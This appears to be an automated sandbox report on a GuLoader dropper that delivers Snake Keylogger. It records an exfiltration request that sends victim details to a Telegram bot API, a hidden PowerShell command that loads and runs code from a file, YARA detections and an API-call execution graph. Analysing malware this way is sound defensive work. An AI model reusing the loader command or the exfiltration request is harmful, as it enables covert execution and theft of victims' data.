                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.549966149.154.167.2204432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:52 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:37:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                        Host: api.telegram.org
                                        Connection: Keep-Alive
                                        2024-10-08 01:32:52 UTC344INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Date: Tue, 08 Oct 2024 01:32:52 GMT
                                        Content-Type: application/json
                                        Content-Length: 55
                                        Connection: close
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                        2024-10-08 01:32:52 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:21:31:55
                                        Start date:07/10/2024
                                        Path:C:\Users\user\Desktop\rPedidoactualizado.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\rPedidoactualizado.exe"
                                        Imagebase:0x400000
                                        File size:692'288 bytes
                                        MD5 hash:E3CA439A218A7EEB9432B91FBF185559
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:21:31:55
                                        Start date:07/10/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)"
                                        Imagebase:0x910000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2355081498.00000000096B6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:21:31:55
                                        Start date:07/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:21:32:26
                                        Start date:07/10/2024
                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                                        Imagebase:0x8d0000
                                        File size:59'904 bytes
                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:24.3%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:20.4%
                                          Total number of Nodes:1340
                                          Total number of Limit Nodes:35
                                          execution_graph 3022 401941 3023 401943 3022->3023 3028 402c41 3023->3028 3029 402c4d 3028->3029 3074 4062b9 3029->3074 3032 401948 3034 4059a9 3032->3034 3116 405c74 3034->3116 3037 4059d1 DeleteFileW 3039 401951 3037->3039 3038 4059e8 3040 405b13 3038->3040 3130 406297 lstrcpynW 3038->3130 3040->3039 3159 4065da FindFirstFileW 3040->3159 3042 405a0e 3043 405a21 3042->3043 3044 405a14 lstrcatW 3042->3044 3131 405bb8 lstrlenW 3043->3131 3046 405a27 3044->3046 3049 405a37 lstrcatW 3046->3049 3050 405a2d 3046->3050 3051 405a42 lstrlenW FindFirstFileW 3049->3051 3050->3049 3050->3051 3053 405b08 3051->3053 3060 405a64 3051->3060 3052 405b31 3162 405b6c lstrlenW CharPrevW 3052->3162 3053->3040 3056 405aeb FindNextFileW 3056->3060 3061 405b01 FindClose 3056->3061 3057 405961 5 API calls 3059 405b43 3057->3059 3062 405b47 3059->3062 3063 405b5d 3059->3063 3060->3056 3067 4059a9 60 API calls 3060->3067 3069 4052ff 24 API calls 3060->3069 3135 406297 lstrcpynW 3060->3135 3136 405961 3060->3136 3144 4052ff 3060->3144 3155 40605d MoveFileExW 3060->3155 3061->3053 3062->3039 3066 4052ff 24 API calls 3062->3066 3065 4052ff 24 API calls 3063->3065 3065->3039 3068 405b54 3066->3068 3067->3060 3070 40605d 36 API calls 3068->3070 3069->3056 3072 405b5b 3070->3072 3072->3039 3075 4062c6 3074->3075 3076 406511 3075->3076 3079 4064df lstrlenW 3075->3079 3081 4062b9 10 API calls 3075->3081 3084 4063f4 GetSystemDirectoryW 3075->3084 3085 406407 GetWindowsDirectoryW 3075->3085 3086 40652b 5 API calls 3075->3086 3087 4062b9 10 API calls 3075->3087 3088 406482 lstrcatW 3075->3088 3089 40643b SHGetSpecialFolderLocation 3075->3089 3100 406165 3075->3100 3105 4061de wsprintfW 3075->3105 3106 406297 lstrcpynW 3075->3106 3077 402c6e 3076->3077 3107 406297 lstrcpynW 3076->3107 3077->3032 3091 40652b 3077->3091 3079->3075 3081->3079 3084->3075 3085->3075 3086->3075 3087->3075 3088->3075 3089->3075 3090 406453 SHGetPathFromIDListW CoTaskMemFree 3089->3090 3090->3075 3098 406538 3091->3098 3092 4065b3 CharPrevW 3095 4065ae 3092->3095 3093 4065a1 CharNextW 3093->3095 3093->3098 3095->3092 3096 4065d4 3095->3096 3096->3032 3097 40658d CharNextW 3097->3098 3098->3093 3098->3095 3098->3097 3099 40659c CharNextW 3098->3099 3112 405b99 3098->3112 3099->3093 3108 406104 3100->3108 3103 406199 RegQueryValueExW RegCloseKey 3104 4061c9 3103->3104 3104->3075 3105->3075 3106->3075 3107->3077 3109 406113 3108->3109 3110 40611c RegOpenKeyExW 3109->3110 3111 406117 3109->3111 3110->3111 3111->3103 3111->3104 3113 405b9f 3112->3113 3114 405bb5 3113->3114 3115 405ba6 CharNextW 3113->3115 3114->3098 3115->3113 3165 406297 lstrcpynW 3116->3165 3118 405c85 3166 405c17 CharNextW CharNextW 3118->3166 3121 4059c9 3121->3037 3121->3038 3122 40652b 5 API calls 3128 405c9b 3122->3128 3123 405ccc lstrlenW 3124 405cd7 3123->3124 3123->3128 3126 405b6c 3 API calls 3124->3126 3125 4065da 2 API calls 3125->3128 3127 405cdc GetFileAttributesW 3126->3127 3127->3121 3128->3121 3128->3123 3128->3125 3129 405bb8 2 API calls 3128->3129 3129->3123 3130->3042 3132 405bc6 3131->3132 3133 405bd8 3132->3133 3134 405bcc CharPrevW 3132->3134 3133->3046 3134->3132 3134->3133 3135->3060 3172 405d68 GetFileAttributesW 3136->3172 3139 40598e 3139->3060 3140 405984 DeleteFileW 3142 40598a 3140->3142 3141 40597c RemoveDirectoryW 3141->3142 3142->3139 3143 40599a SetFileAttributesW 3142->3143 3143->3139 3145 40531a 3144->3145 3154 4053bc 3144->3154 3146 405336 lstrlenW 3145->3146 3147 4062b9 17 API calls 3145->3147 3148 405344 lstrlenW 3146->3148 3149 40535f 3146->3149 3147->3146 3150 405356 lstrcatW 3148->3150 3148->3154 3151 405372 3149->3151 3152 405365 SetWindowTextW 3149->3152 3150->3149 3153 405378 SendMessageW SendMessageW SendMessageW 3151->3153 3151->3154 3152->3151 3153->3154 3154->3060 3156 40607e 3155->3156 3157 406071 3155->3157 3156->3060 3175 405ee3 3157->3175 3160 4065f0 FindClose 3159->3160 3161 405b2d 3159->3161 3160->3161 3161->3039 3161->3052 3163 405b37 3162->3163 3164 405b88 lstrcatW 3162->3164 3163->3057 3164->3163 3165->3118 3167 405c34 3166->3167 3168 405c46 3166->3168 3167->3168 3169 405c41 CharNextW 3167->3169 3170 405b99 CharNextW 3168->3170 3171 405c6a 3168->3171 3169->3171 3170->3168 3171->3121 3171->3122 3173 40596d 3172->3173 3174 405d7a SetFileAttributesW 3172->3174 3173->3139 3173->3140 3173->3141 3174->3173 3176 405f13 3175->3176 3177 405f39 GetShortPathNameW 3175->3177 3202 405d8d GetFileAttributesW CreateFileW 3176->3202 3179 406058 3177->3179 3180 405f4e 3177->3180 3179->3156 3180->3179 3182 405f56 wsprintfA 3180->3182 3181 405f1d CloseHandle GetShortPathNameW 3181->3179 3184 405f31 3181->3184 3183 4062b9 17 API calls 3182->3183 3185 405f7e 3183->3185 3184->3177 3184->3179 3203 405d8d GetFileAttributesW CreateFileW 3185->3203 3187 405f8b 3187->3179 3188 405f9a GetFileSize GlobalAlloc 3187->3188 3189 406051 CloseHandle 3188->3189 3190 405fbc 3188->3190 3189->3179 3204 405e10 ReadFile 3190->3204 3195 405fdb lstrcpyA 3198 405ffd 3195->3198 3196 405fef 3197 405cf2 4 API calls 3196->3197 3197->3198 3199 406034 SetFilePointer 3198->3199 3211 405e3f WriteFile 3199->3211 3202->3181 3203->3187 3205 405e2e 3204->3205 3205->3189 3206 405cf2 lstrlenA 3205->3206 3207 405d33 lstrlenA 3206->3207 3208 405d3b 3207->3208 3209 405d0c lstrcmpiA 3207->3209 3208->3195 3208->3196 3209->3208 3210 405d2a CharNextA 3209->3210 3210->3207 3212 405e5d GlobalFree 3211->3212 3212->3189 3213 4015c1 3214 402c41 17 API calls 3213->3214 3215 4015c8 3214->3215 3216 405c17 4 API calls 3215->3216 3226 4015d1 3216->3226 3217 401631 3219 401663 3217->3219 3220 401636 3217->3220 3218 405b99 CharNextW 3218->3226 3222 401423 24 API calls 3219->3222 3240 401423 3220->3240 3230 40165b 3222->3230 3226->3217 3226->3218 3229 401617 GetFileAttributesW 3226->3229 3232 405868 3226->3232 3235 4057ce CreateDirectoryW 3226->3235 3244 40584b CreateDirectoryW 3226->3244 3228 40164a SetCurrentDirectoryW 3228->3230 3229->3226 3247 406671 GetModuleHandleA 3232->3247 3236 40581b 3235->3236 3237 40581f GetLastError 3235->3237 3236->3226 3237->3236 3238 40582e SetFileSecurityW 3237->3238 3238->3236 3239 405844 GetLastError 3238->3239 3239->3236 3241 4052ff 24 API calls 3240->3241 3242 401431 3241->3242 3243 406297 lstrcpynW 3242->3243 3243->3228 3245 40585b 3244->3245 3246 40585f GetLastError 3244->3246 3245->3226 3246->3245 3248 406697 GetProcAddress 3247->3248 3249 40668d 3247->3249 3252 40586f 3248->3252 3253 406601 GetSystemDirectoryW 3249->3253 3251 406693 3251->3248 3251->3252 3252->3226 3254 406623 wsprintfW LoadLibraryExW 3253->3254 3254->3251 3907 404344 lstrcpynW lstrlenW 3908 403945 3909 403950 3908->3909 3910 403957 GlobalAlloc 3909->3910 3911 403954 3909->3911 3910->3911 3912 401e49 3913 402c1f 17 API calls 3912->3913 3914 401e4f 3913->3914 3915 402c1f 17 API calls 3914->3915 3916 401e5b 3915->3916 3917 401e72 EnableWindow 3916->3917 3918 401e67 ShowWindow 3916->3918 3919 402ac5 3917->3919 3918->3919 3920 40264a 3921 402c1f 17 API calls 3920->3921 3929 402659 3921->3929 3922 402796 3923 4026a3 ReadFile 3923->3922 3923->3929 3924 405e10 ReadFile 3924->3929 3925 4026e3 MultiByteToWideChar 3925->3929 3926 402798 3942 4061de wsprintfW 3926->3942 3929->3922 3929->3923 3929->3924 3929->3925 3929->3926 3930 402709 SetFilePointer MultiByteToWideChar 3929->3930 3931 4027a9 3929->3931 3933 405e6e SetFilePointer 3929->3933 3930->3929 3931->3922 3932 4027ca SetFilePointer 3931->3932 3932->3922 3934 405e8a 3933->3934 3939 405ea2 3933->3939 3935 405e10 ReadFile 3934->3935 3936 405e96 3935->3936 3937 405ed3 SetFilePointer 3936->3937 3938 405eab SetFilePointer 3936->3938 3936->3939 3937->3939 3938->3937 3940 405eb6 3938->3940 3939->3929 3941 405e3f WriteFile 3940->3941 3941->3939 3942->3922 3946 4016cc 3947 402c41 17 API calls 3946->3947 3948 4016d2 GetFullPathNameW 3947->3948 3950 4016ec 3948->3950 3955 40170e 3948->3955 3949 401723 GetShortPathNameW 3952 402ac5 3949->3952 3951 4065da 2 API calls 3950->3951 3950->3955 3953 4016fe 3951->3953 3953->3955 3956 406297 lstrcpynW 3953->3956 3955->3949 3955->3952 3956->3955 3957 4043cd 3958 4043e5 3957->3958 3964 4044ff 3957->3964 3965 40420e 18 API calls 3958->3965 3959 404569 3960 404633 3959->3960 3961 404573 GetDlgItem 3959->3961 3966 404275 8 API calls 3960->3966 3962 4045f4 3961->3962 3963 40458d 3961->3963 3962->3960 3972 404606 3962->3972 3963->3962 3971 4045b3 SendMessageW LoadCursorW SetCursor 3963->3971 3964->3959 3964->3960 3967 40453a GetDlgItem SendMessageW 3964->3967 3968 40444c 3965->3968 3970 40462e 3966->3970 3990 404230 KiUserCallbackDispatcher 3967->3990 3969 40420e 18 API calls 3968->3969 3974 404459 CheckDlgButton 3969->3974 3994 40467c 3971->3994 3976 40461c 3972->3976 3977 40460c SendMessageW 3972->3977 3988 404230 KiUserCallbackDispatcher 3974->3988 3976->3970 3981 404622 SendMessageW 3976->3981 3977->3976 3978 404564 3991 404658 3978->3991 3981->3970 3983 404477 GetDlgItem 3989 404243 SendMessageW 3983->3989 3985 40448d SendMessageW 3986 4044b3 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3985->3986 3987 4044aa GetSysColor 3985->3987 3986->3970 3987->3986 3988->3983 3989->3985 3990->3978 3992 404666 3991->3992 3993 40466b SendMessageW 3991->3993 3992->3993 3993->3959 3997 4058c3 ShellExecuteExW 3994->3997 3996 4045e2 LoadCursorW SetCursor 3996->3962 3997->3996 3998 40234e 3999 402c41 17 API calls 3998->3999 4000 40235d 3999->4000 4001 402c41 17 API calls 4000->4001 4002 402366 4001->4002 4003 402c41 17 API calls 4002->4003 4004 402370 GetPrivateProfileStringW 4003->4004 4005 401b53 4006 402c41 17 API calls 4005->4006 4007 401b5a 4006->4007 4008 402c1f 17 API calls 4007->4008 4009 401b63 wsprintfW 4008->4009 4010 402ac5 4009->4010 4011 404a55 4012 404a81 4011->4012 4013 404a65 4011->4013 4015 404ab4 4012->4015 4016 404a87 SHGetPathFromIDListW 4012->4016 4022 4058e1 GetDlgItemTextW 4013->4022 4018 404a9e SendMessageW 4016->4018 4019 404a97 4016->4019 4017 404a72 SendMessageW 4017->4012 4018->4015 4021 40140b 2 API calls 4019->4021 4021->4018 4022->4017 4023 401956 4024 402c41 17 API calls 4023->4024 4025 40195d lstrlenW 4024->4025 4026 402592 4025->4026 4027 4014d7 4028 402c1f 17 API calls 4027->4028 4029 4014dd Sleep 4028->4029 4031 402ac5 4029->4031 3837 402259 3838 402c41 17 API calls 3837->3838 3839 40225f 3838->3839 3840 402c41 17 API calls 3839->3840 3841 402268 3840->3841 3842 402c41 17 API calls 3841->3842 3843 402271 3842->3843 3844 4065da 2 API calls 3843->3844 3845 40227a 3844->3845 3846 40228b lstrlenW lstrlenW 3845->3846 3847 40227e 3845->3847 3849 4052ff 24 API calls 3846->3849 3848 4052ff 24 API calls 3847->3848 3851 402286 3848->3851 3850 4022c9 SHFileOperationW 3849->3850 3850->3847 3850->3851 3852 40175c 3853 402c41 17 API calls 3852->3853 3854 401763 3853->3854 3855 405dbc 2 API calls 3854->3855 3856 40176a 3855->3856 3857 405dbc 2 API calls 3856->3857 3857->3856 4032 401d5d GetDlgItem GetClientRect 4033 402c41 17 API calls 4032->4033 4034 401d8f LoadImageW SendMessageW 4033->4034 4035 402ac5 4034->4035 4036 401dad DeleteObject 4034->4036 4036->4035 4037 4022dd 4038 4022e4 4037->4038 4041 4022f7 4037->4041 4039 4062b9 17 API calls 4038->4039 4040 4022f1 4039->4040 4042 4058fd MessageBoxIndirectW 4040->4042 4042->4041 4043 401563 4044 402a6b 4043->4044 4047 4061de wsprintfW 4044->4047 4046 402a70 4047->4046 3260 4023e4 3261 402c41 17 API calls 3260->3261 3262 4023f6 3261->3262 3263 402c41 17 API calls 3262->3263 3264 402400 3263->3264 3277 402cd1 3264->3277 3267 402ac5 3268 402438 3269 402444 3268->3269 3301 402c1f 3268->3301 3272 402463 RegSetValueExW 3269->3272 3281 403116 3269->3281 3270 402c41 17 API calls 3273 40242e lstrlenW 3270->3273 3275 402479 RegCloseKey 3272->3275 3273->3268 3275->3267 3278 402cec 3277->3278 3304 406132 3278->3304 3282 40312f 3281->3282 3283 40315d 3282->3283 3311 403324 SetFilePointer 3282->3311 3308 40330e 3283->3308 3287 4032a7 3290 4032e9 3287->3290 3293 4032ab 3287->3293 3288 40317a GetTickCount 3289 403291 3288->3289 3297 4031a6 3288->3297 3289->3272 3292 40330e ReadFile 3290->3292 3291 40330e ReadFile 3291->3297 3292->3289 3293->3289 3294 40330e ReadFile 3293->3294 3295 405e3f WriteFile 3293->3295 3294->3293 3295->3293 3296 4031fc GetTickCount 3296->3297 3297->3289 3297->3291 3297->3296 3298 403221 MulDiv wsprintfW 3297->3298 3300 405e3f WriteFile 3297->3300 3299 4052ff 24 API calls 3298->3299 3299->3297 3300->3297 3302 4062b9 17 API calls 3301->3302 3303 402c34 3302->3303 3303->3269 3305 406141 3304->3305 3306 402410 3305->3306 3307 40614c RegCreateKeyExW 3305->3307 3306->3267 3306->3268 3306->3270 3307->3306 3309 405e10 ReadFile 3308->3309 3310 403168 3309->3310 3310->3287 3310->3288 3310->3289 3311->3283 3357 402868 3358 402c41 17 API calls 3357->3358 3359 40286f FindFirstFileW 3358->3359 3360 402897 3359->3360 3363 402882 3359->3363 3365 4061de wsprintfW 3360->3365 3362 4028a0 3366 406297 lstrcpynW 3362->3366 3365->3362 3366->3363 4048 401968 4049 402c1f 17 API calls 4048->4049 4050 40196f 4049->4050 4051 402c1f 17 API calls 4050->4051 4052 40197c 4051->4052 4053 402c41 17 API calls 4052->4053 4054 401993 lstrlenW 4053->4054 4055 4019a4 4054->4055 4059 4019e5 4055->4059 4060 406297 lstrcpynW 4055->4060 4057 4019d5 4058 4019da lstrlenW 4057->4058 4057->4059 4058->4059 4060->4057 4061 40166a 4062 402c41 17 API calls 4061->4062 4063 401670 4062->4063 4064 4065da 2 API calls 4063->4064 4065 401676 4064->4065 3367 40336c SetErrorMode GetVersion 3368 4033ab 3367->3368 3369 4033b1 3367->3369 3370 406671 5 API calls 3368->3370 3371 406601 3 API calls 3369->3371 3370->3369 3372 4033c7 lstrlenA 3371->3372 3372->3369 3373 4033d7 3372->3373 3374 406671 5 API calls 3373->3374 3375 4033de 3374->3375 3376 406671 5 API calls 3375->3376 3377 4033e5 3376->3377 3378 406671 5 API calls 3377->3378 3379 4033f1 #17 OleInitialize SHGetFileInfoW 3378->3379 3457 406297 lstrcpynW 3379->3457 3382 40343d GetCommandLineW 3458 406297 lstrcpynW 3382->3458 3384 40344f 3385 405b99 CharNextW 3384->3385 3386 403474 CharNextW 3385->3386 3387 40359e GetTempPathW 3386->3387 3398 40348d 3386->3398 3459 40333b 3387->3459 3389 4035b6 3390 403610 DeleteFileW 3389->3390 3391 4035ba GetWindowsDirectoryW lstrcatW 3389->3391 3469 402edd GetTickCount GetModuleFileNameW 3390->3469 3392 40333b 12 API calls 3391->3392 3395 4035d6 3392->3395 3393 405b99 CharNextW 3393->3398 3395->3390 3397 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3395->3397 3396 403624 3405 405b99 CharNextW 3396->3405 3439 4036c7 3396->3439 3452 4036d7 3396->3452 3399 40333b 12 API calls 3397->3399 3398->3393 3400 403589 3398->3400 3401 403587 3398->3401 3403 403608 3399->3403 3553 406297 lstrcpynW 3400->3553 3401->3387 3403->3390 3403->3452 3422 403643 3405->3422 3408 403811 3411 403895 ExitProcess 3408->3411 3412 403819 GetCurrentProcess OpenProcessToken 3408->3412 3409 4036f1 3563 4058fd 3409->3563 3417 403831 LookupPrivilegeValueW AdjustTokenPrivileges 3412->3417 3418 403865 3412->3418 3415 4036a1 3419 405c74 18 API calls 3415->3419 3416 403707 3420 405868 5 API calls 3416->3420 3417->3418 3421 406671 5 API calls 3418->3421 3423 4036ad 3419->3423 3424 40370c lstrcatW 3420->3424 3434 40386c 3421->3434 3422->3415 3422->3416 3423->3452 3554 406297 lstrcpynW 3423->3554 3425 403728 lstrcatW lstrcmpiW 3424->3425 3426 40371d lstrcatW 3424->3426 3429 403744 3425->3429 3425->3452 3426->3425 3427 403881 ExitWindowsEx 3427->3411 3430 40388e 3427->3430 3432 403750 3429->3432 3433 403749 3429->3433 3569 40140b 3430->3569 3431 4036bc 3555 406297 lstrcpynW 3431->3555 3438 40584b 2 API calls 3432->3438 3437 4057ce 4 API calls 3433->3437 3434->3427 3434->3430 3440 40374e 3437->3440 3441 403755 SetCurrentDirectoryW 3438->3441 3497 403987 3439->3497 3440->3441 3442 403770 3441->3442 3443 403765 3441->3443 3568 406297 lstrcpynW 3442->3568 3567 406297 lstrcpynW 3443->3567 3446 4062b9 17 API calls 3447 4037af DeleteFileW 3446->3447 3448 4037bc CopyFileW 3447->3448 3454 40377e 3447->3454 3448->3454 3449 403805 3450 40605d 36 API calls 3449->3450 3450->3452 3451 40605d 36 API calls 3451->3454 3556 4038ad 3452->3556 3453 4062b9 17 API calls 3453->3454 3454->3446 3454->3449 3454->3451 3454->3453 3455 405880 2 API calls 3454->3455 3456 4037f0 CloseHandle 3454->3456 3455->3454 3456->3454 3457->3382 3458->3384 3460 40652b 5 API calls 3459->3460 3462 403347 3460->3462 3461 403351 3461->3389 3462->3461 3463 405b6c 3 API calls 3462->3463 3464 403359 3463->3464 3465 40584b 2 API calls 3464->3465 3466 40335f 3465->3466 3572 405dbc 3466->3572 3576 405d8d GetFileAttributesW CreateFileW 3469->3576 3471 402f1d 3496 402f2d 3471->3496 3577 406297 lstrcpynW 3471->3577 3473 402f43 3474 405bb8 2 API calls 3473->3474 3475 402f49 3474->3475 3578 406297 lstrcpynW 3475->3578 3477 402f54 GetFileSize 3492 403050 3477->3492 3495 402f6b 3477->3495 3479 403059 3481 403089 GlobalAlloc 3479->3481 3479->3496 3591 403324 SetFilePointer 3479->3591 3480 40330e ReadFile 3480->3495 3590 403324 SetFilePointer 3481->3590 3484 4030bc 3486 402e79 6 API calls 3484->3486 3485 4030a4 3488 403116 31 API calls 3485->3488 3486->3496 3487 403072 3489 40330e ReadFile 3487->3489 3493 4030b0 3488->3493 3491 40307d 3489->3491 3490 402e79 6 API calls 3490->3495 3491->3481 3491->3496 3579 402e79 3492->3579 3493->3493 3494 4030ed SetFilePointer 3493->3494 3493->3496 3494->3496 3495->3480 3495->3484 3495->3490 3495->3492 3495->3496 3496->3396 3498 406671 5 API calls 3497->3498 3499 40399b 3498->3499 3500 4039a1 3499->3500 3501 4039b3 3499->3501 3607 4061de wsprintfW 3500->3607 3502 406165 3 API calls 3501->3502 3503 4039e3 3502->3503 3505 403a02 lstrcatW 3503->3505 3507 406165 3 API calls 3503->3507 3506 4039b1 3505->3506 3592 403c5d 3506->3592 3507->3505 3510 405c74 18 API calls 3511 403a34 3510->3511 3512 403ac8 3511->3512 3514 406165 3 API calls 3511->3514 3513 405c74 18 API calls 3512->3513 3515 403ace 3513->3515 3517 403a66 3514->3517 3516 403ade LoadImageW 3515->3516 3518 4062b9 17 API calls 3515->3518 3519 403b84 3516->3519 3520 403b05 RegisterClassW 3516->3520 3517->3512 3521 403a87 lstrlenW 3517->3521 3524 405b99 CharNextW 3517->3524 3518->3516 3523 40140b 2 API calls 3519->3523 3522 403b3b SystemParametersInfoW CreateWindowExW 3520->3522 3552 403b8e 3520->3552 3525 403a95 lstrcmpiW 3521->3525 3526 403abb 3521->3526 3522->3519 3527 403b8a 3523->3527 3528 403a84 3524->3528 3525->3526 3529 403aa5 GetFileAttributesW 3525->3529 3530 405b6c 3 API calls 3526->3530 3532 403c5d 18 API calls 3527->3532 3527->3552 3528->3521 3531 403ab1 3529->3531 3533 403ac1 3530->3533 3531->3526 3534 405bb8 2 API calls 3531->3534 3535 403b9b 3532->3535 3608 406297 lstrcpynW 3533->3608 3534->3526 3537 403ba7 ShowWindow 3535->3537 3538 403c2a 3535->3538 3539 406601 3 API calls 3537->3539 3600 4053d2 OleInitialize 3538->3600 3541 403bbf 3539->3541 3543 403bcd GetClassInfoW 3541->3543 3546 406601 3 API calls 3541->3546 3542 403c30 3544 403c34 3542->3544 3545 403c4c 3542->3545 3548 403be1 GetClassInfoW RegisterClassW 3543->3548 3549 403bf7 DialogBoxParamW 3543->3549 3550 40140b 2 API calls 3544->3550 3544->3552 3547 40140b 2 API calls 3545->3547 3546->3543 3547->3552 3548->3549 3551 40140b 2 API calls 3549->3551 3550->3552 3551->3552 3552->3452 3553->3401 3554->3431 3555->3439 3557 4038c5 3556->3557 3558 4038b7 CloseHandle 3556->3558 3620 4038f2 3557->3620 3558->3557 3561 4059a9 67 API calls 3562 4036e0 OleUninitialize 3561->3562 3562->3408 3562->3409 3564 405912 3563->3564 3565 4036ff ExitProcess 3564->3565 3566 405926 MessageBoxIndirectW 3564->3566 3566->3565 3567->3442 3568->3454 3570 401389 2 API calls 3569->3570 3571 401420 3570->3571 3571->3411 3573 405dc9 GetTickCount GetTempFileNameW 3572->3573 3574 40336a 3573->3574 3575 405dff 3573->3575 3574->3389 3575->3573 3575->3574 3576->3471 3577->3473 3578->3477 3580 402e82 3579->3580 3581 402e9a 3579->3581 3584 402e92 3580->3584 3585 402e8b DestroyWindow 3580->3585 3582 402ea2 3581->3582 3583 402eaa GetTickCount 3581->3583 3586 4066ad 2 API calls 3582->3586 3587 402eb8 CreateDialogParamW ShowWindow 3583->3587 3588 402edb 3583->3588 3584->3479 3585->3584 3589 402ea8 3586->3589 3587->3588 3588->3479 3589->3479 3590->3485 3591->3487 3593 403c71 3592->3593 3609 4061de wsprintfW 3593->3609 3595 403ce2 3610 403d16 3595->3610 3597 403a12 3597->3510 3598 403ce7 3598->3597 3599 4062b9 17 API calls 3598->3599 3599->3598 3613 40425a 3600->3613 3602 40541c 3603 40425a SendMessageW 3602->3603 3605 40542e CoUninitialize 3603->3605 3604 4053f5 3604->3602 3616 401389 3604->3616 3605->3542 3607->3506 3608->3512 3609->3595 3611 4062b9 17 API calls 3610->3611 3612 403d24 SetWindowTextW 3611->3612 3612->3598 3614 404272 3613->3614 3615 404263 SendMessageW 3613->3615 3614->3604 3615->3614 3618 401390 3616->3618 3617 4013fe 3617->3604 3618->3617 3619 4013cb MulDiv SendMessageW 3618->3619 3619->3618 3621 403900 3620->3621 3622 4038ca 3621->3622 3623 403905 FreeLibrary GlobalFree 3621->3623 3622->3561 3623->3622 3623->3623 3663 40176f 3664 402c41 17 API calls 3663->3664 3665 401776 3664->3665 3666 401796 3665->3666 3667 40179e 3665->3667 3702 406297 lstrcpynW 3666->3702 3703 406297 lstrcpynW 3667->3703 3670 4017a9 3672 405b6c 3 API calls 3670->3672 3671 40179c 3674 40652b 5 API calls 3671->3674 3673 4017af lstrcatW 3672->3673 3673->3671 3690 4017bb 3674->3690 3675 4065da 2 API calls 3675->3690 3677 405d68 2 API calls 3677->3690 3678 4017cd CompareFileTime 3678->3690 3679 40188d 3681 4052ff 24 API calls 3679->3681 3680 401864 3682 4052ff 24 API calls 3680->3682 3691 401879 3680->3691 3684 401897 3681->3684 3682->3691 3683 406297 lstrcpynW 3683->3690 3685 403116 31 API calls 3684->3685 3686 4018aa 3685->3686 3687 4018be SetFileTime 3686->3687 3689 4018d0 CloseHandle 3686->3689 3687->3689 3688 4062b9 17 API calls 3688->3690 3689->3691 3692 4018e1 3689->3692 3690->3675 3690->3677 3690->3678 3690->3679 3690->3680 3690->3683 3690->3688 3699 4058fd MessageBoxIndirectW 3690->3699 3701 405d8d GetFileAttributesW CreateFileW 3690->3701 3693 4018e6 3692->3693 3694 4018f9 3692->3694 3695 4062b9 17 API calls 3693->3695 3696 4062b9 17 API calls 3694->3696 3697 4018ee lstrcatW 3695->3697 3698 401901 3696->3698 3697->3698 3700 4058fd MessageBoxIndirectW 3698->3700 3699->3690 3700->3691 3701->3690 3702->3671 3703->3670 4066 4027ef 4067 4027f6 4066->4067 4069 402a70 4066->4069 4068 402c1f 17 API calls 4067->4068 4070 4027fd 4068->4070 4071 40280c SetFilePointer 4070->4071 4071->4069 4072 40281c 4071->4072 4074 4061de wsprintfW 4072->4074 4074->4069 4075 401a72 4076 402c1f 17 API calls 4075->4076 4077 401a7b 4076->4077 4078 402c1f 17 API calls 4077->4078 4079 401a20 4078->4079 3727 401573 3728 401583 ShowWindow 3727->3728 3729 40158c 3727->3729 3728->3729 3730 402ac5 3729->3730 3731 40159a ShowWindow 3729->3731 